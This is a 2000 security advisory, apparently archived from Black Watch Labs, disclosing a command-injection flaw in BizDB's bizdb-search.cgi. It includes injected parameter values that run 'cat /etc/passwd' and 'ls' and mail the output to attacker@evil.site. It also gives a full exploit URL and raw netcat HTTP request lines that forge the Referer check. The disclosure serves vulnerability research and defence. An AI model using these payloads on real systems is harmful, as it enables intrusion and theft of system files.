exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BWL-00-04.txt

BWL-00-04.txt
Posted Dec 7, 2000
Authored by Black Watch Labs | Site perfectotech.com

Black Watch Labs Security Advisory #00-04 (April 6, 2000) - BizDB is a database and search engine software by Cnctek. Part of the installation is a CGI script, ?bizdb-search.cgi? which is used to search the bizdb database. This script is vulnerable to modification of its paramater, in such way that causes it to run user provided shell commands on the server. Exploit URL's included. These issues have been resolved in newer versions of this software, make sure to upgrade!

tags | shell, cgi
SHA-256 | 24a4ed5c6abb15a3bce91a5494875ecada0d11f6a7bde42b93605a2e1bbe0bd7

BWL-00-04.txt

Change Mirror Download
Vendor response: The security bugs have been fixed in all the more recent versions this software.  Upgrade!





Black Watch Lab - Vulnerabilities

Black Watch Labs ID: BWL-00-04

BizDB Search Script Enables Shell Command Execution at the Server
Black Watch Labs Security Advisory #00-04 (April 06, 2000)
Name:
BizDB Search Script Enables Shell Command Execution at the Server
Black Watch Labs ID:
BWL-00-04
Date Released:
April 6, 2000
Category:
Application (HTML) - parameter modification
Products affected:
BizDB
Number of affected sites/pages/users:
We assume up to a thousand pages utilize BizDB
Summary:
BizDB is a database and search engine software by Cnctek. Part of the installation is a CGI script, bizdb-search.cgi
which is used to search the bizdb database. This script is vulnerable to modification of its paramater, in such way
that causes it to run user provided shell commands on the server.
Analysis:
The bizdb-search.cgi script is probably a Perl script which utilizes the open command without protection or input
sanity checks. The open command is used in order to open the database whose name appears in the user input. As a
result, an attacker can change this parameter and take advantage of the piping feature, so that instead of the
original database file name, say bizdb, the attacker sends ; ... exploit commands ...|, such as:
;cat%20/etc/passwd|mail%20attacker@evil.site|,
in order to send the contents of /etc/passwd file (assuming a UNIX server) to the attackers email account. The script
optionally checks for the HTTP_REFERER field to possess some specific value (that of the referring page), but this
field can easily be forged if the request is generated by a raw TCP/IP client (such as netcat, and perhaps even
telnet), by sending the raw GET request line (GET url HTTP/1.0) followed by a Referer line (Referer: page), where the
page is the one in which the form was found.
Exploits:
The demonstration area provided by Cnctek has a link that searches for all companies in the database whose name starts
with A. This link is
http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-
summary&dbname=bizdb&f6=^a.*&action=searchdbdisplay
(this link does not work as it does not contain the referrer, which is why netcat must be used to exploit the
vulnerability).
If an attacker changes the dbname parameter into:
;ls|mail%20attacker@evil.site|
and sends the modified request:
http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-
summary&dbname=;ls|mail%
20attacker@evil.site|&f6=^a.*&action=searchdbdisplay,
the results of the ls command will be sent to the attackers email account. The arguments for the netcat command should
be www.cnctek.com 80, and the exact lines for the netcat input (i.e. the HTTP request) are:
GET /cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%
20attacker@evil.site|&f6=^a.*&action=searchdbdisplay HTTP/1.0
Host: www.cnctek.com
Referer: http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?bizdb-search
(empty line)
(End of Input)
Vendor Status:
The vendor was contacted, but does not seem to understand the nature of the problem. In their reply, they claim that
there exists a mechanism that prevents the exploit. We strongly suspect they refer to ensuring that the HTTP_REFERER
environment variable matches the referring page in the site. Again, this provides no extra security, as it can by
easily bypassed by forging the HTTP request.
Vendor Patch or workaround:
No patch or workaround available at the time of this release.

References and Links:
CNCTek: http://www.cnctek.com/
BizDB section: http://www.cnctek.com/bizdb-html/
BizDB demonstration: http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?bizdb-search
About Black Watch Labs (www.perfectotech.com/blackwatchlabs/)
Black Watch Labs is a research group operated by Perfecto Technologies Inc., the leader in Web Application Security
Management. Black Watch Labs was established in order to further the knowledge of the Internet community in the arena
of Web application security management. Black Watch Labs publishes security advisories regularly, which are maintained
at http://www.perfectotech.com/blackwatchlabs/, and are also posted to relevant security lists and Web sites. Black
Watch Labs also operates a Web application security mailing list, which can be subscribed to at
http://www.perfectotech.com/blackwatchlabs/. For more info about Black Watch Labs and Web Application Security
Management, please call (408) 855-9500 or email BlackWatchLabs@perfectotech.com.

About Perfecto Technologies (http://www.perfectotech.com/)
Founded in 1997 and headquartered in Santa Clara, Calif., Perfecto Technologies is the leader in Web Application
Security Management software. AppShield(TM), Perfecto's flagship product, is the first to provide automatic Web site
security, enabling companies to realize faster time to market while meeting the demand for privacy and security. Black
Watch Labs was established to further the knowledge of Web application security within the Internet security
community. Privately held, Perfecto is funded by blue-chip venture capital firms and industry leaders, including
Goldman Sachs, Intel Corporation, Sequoia Capital, The Sprout Group and Walden Israel. More information about Perfecto
Technologies may be obtained by visiting the Company's Web site at www.perfectotech.com or by calling the Company
directly at (408) 855-9500.
Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved.
Permission is hereby granted to reproduce and distribute the application security alerts herein in their entirety,
provided the information, this notice and all other Perfecto Technologies marks remain intact.
Specific Limitations on Use of the Black Watch Labs Advisories
THIS ADVISORY INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN SECURITY RISKS AND ISSUES ASSOCIATED WITH SITES ON
THE INTERNET, INCLUDING, POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS ADVISORY IS SOLELY FOR THE
PURPOSES OF UNDERSTANDING THESE RISKS AND ISSUES WITH RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED BY
PERFECTO TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED TO YOU FOR ANY IMPROPER OR ILLEGAL PURPOSE,
INCLUDING TO VIOLATE THE SECURITY OF ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE USE FOR ANY IMPROPER
PURPOSE OF INFORMATION DISCLOSED TO YOU COULD SUBJECT YOU TO CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND
OTHER COUNTRIES.
NO WARRANTY
Any material furnished by Perfecto Technologies is furnished on an "as is" basis and may change without notice.
Perfecto Technologies makes no warranties of any kind, either expressed or implied as to any matter including but not
limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use
of the material. Neither does Perfecto Technologies make any warranty of any kind with respect to freedom from patent,
trademark or copyright infringement. In no event shall Perfecto Technologies be liable for any damages whatsoever
arising out of or in connection with the use or spread of this information. Any use of this information is at the
user's own risk.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close